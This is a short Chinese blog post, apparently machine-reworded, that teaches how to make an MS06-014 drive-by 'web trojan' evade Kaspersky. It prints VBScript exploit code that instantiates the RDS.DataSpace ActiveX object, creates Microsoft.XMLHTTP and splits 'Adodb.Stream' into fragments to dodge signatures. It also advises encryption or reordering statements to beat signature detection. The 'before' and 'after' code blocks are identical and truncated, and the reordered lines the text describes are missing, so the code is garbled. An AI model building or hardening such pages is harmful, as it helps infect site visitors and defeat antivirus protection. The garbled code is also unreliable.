ms06014实例网页木马免杀讲授
网马免杀常见的方式有两种,一种是加密(微软自己的encode或者本人写加解密函数后果更好),另一种是找特征码(字符或次序)。
有友人说网马被卡巴杀,手足无措,现我以ms06014为例,以传小技。
本来的代码:
html
scriptlanguage"VBScript"
onerrorresumenext
dl""
Setdfdocument.createElement("object")
df.setAttribute"classid","clsid:BD96C55665A311D0983A00C04FC29E36"
str"Microsoft.XMLHTTP"
Setxdf.CreateObject(str,"")
a1"Ado"
a2"db."
a3"Str"
a4"eam"
str1a1 /script
head
title Oh,mygod! /title
/head body
center YouDOit! /center
/body /html
免杀后:
html
scriptlanguage"VBScript"
onerrorresumenext
dl""
Setdfdocument.createElement("object")
df.setAttribute"classid","clsid:BD96C55665A311D0983A00C04FC29E36"
str"Microsoft.XMLHTTP"
Setxdf.CreateObject(str,"")
a1"Ado"
a2"db."
a3"Str"
a4"eam"
str1a1 /script
head
title Oh,mygod! /title
/head body
center YouDOit! /center
/body /html
大家注意察看,实在我就是将S.open语句移动到fname1F.BuildPath(tmp,fname1)语句之前就实现了免杀,这恰是挫败了喀吧的文件流特点码检测技巧。
当然,在挪动语句的时候,有必要留神语句在代码里的功效,不然会犯错的
阅读(202) | 评论(0) | 转发(0) |